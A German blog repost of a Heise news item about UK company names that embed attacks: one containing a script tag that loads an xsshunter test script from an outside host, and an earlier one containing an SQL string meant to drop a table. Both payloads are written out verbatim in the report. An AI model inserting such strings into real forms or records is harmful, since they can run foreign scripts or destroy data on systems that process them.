Akzeptieren

Die Cookies helfen mir bei der Bereitstellung der Inhalte und Dienste. Durch die Nutzung meines Blogs erklärst du dich damit einverstanden, dass ich Cookies setzen darf.

»: Thanks for coming!
       
      
Aktuelle Seite: News

Mittwoch 25. 11. 2020 - 16:50 Uhr

l+f: Wenn der Firmenname zum Sicherheitsrisiko wird



Eigentlich wollte ein britischer Entwickler seiner neuen Beratungsfirma nur einen "lustigen und spielerischen Namen" geben. Dafür nutzte er HTML-Code, der einen Cross-Site-Scripting-Angriff auslösen kann. Verantwortliche des Companies House, die das britische Handelsregister führen, fanden das wohl weniger lustig.

Wie der Guardian berichtet, hieß die Firma ursprünglich "><SCRIPT SRC=HTTPS://MJT.XSS.HT> LTD. Von manchen Websites könnte dieser Name als ausführbarer Code behandelt werden. Das in diesem Fall aufgerufene Skript führt dann ein Test-Skript der Seite xsshunter.com aus, mit dem man Schwachstellen für Cross-Site-Scripting aufspüren kann.

Gegenüber dem Guardian sagte der Entwickler, er hätte erwartet, dass der Name kein Problem darstelle. Die Regierungsseiten hätten einen guten Ruf in Sicherheitsfragen und es gab auch früher schon ähnliche Firmennamen. Das sah die Behörde offenbar anders: Der Firmenname lautet jetzt THAT COMPANY WHOSE NAME USED TO CONTAIN HTML SCRIPT TAGS LTD.

Nicht der erste gefährliche Firmenname
In einem früheren Fall wählte ein Unternehmen einen SQL-Befehl als Namen aus: ; DROP TABLE “COMPANIES”;-- LTD konnte dazu führen, dass SQL-Tabellen gelöscht werden. Hier musste sich die Firma nicht umbenennen, allerdings heißt es im Handelsregister lediglich "Company name available on request".

Quelle: Heise


[ 1 | 2 ]

SkidrowCrack   A1-VBcode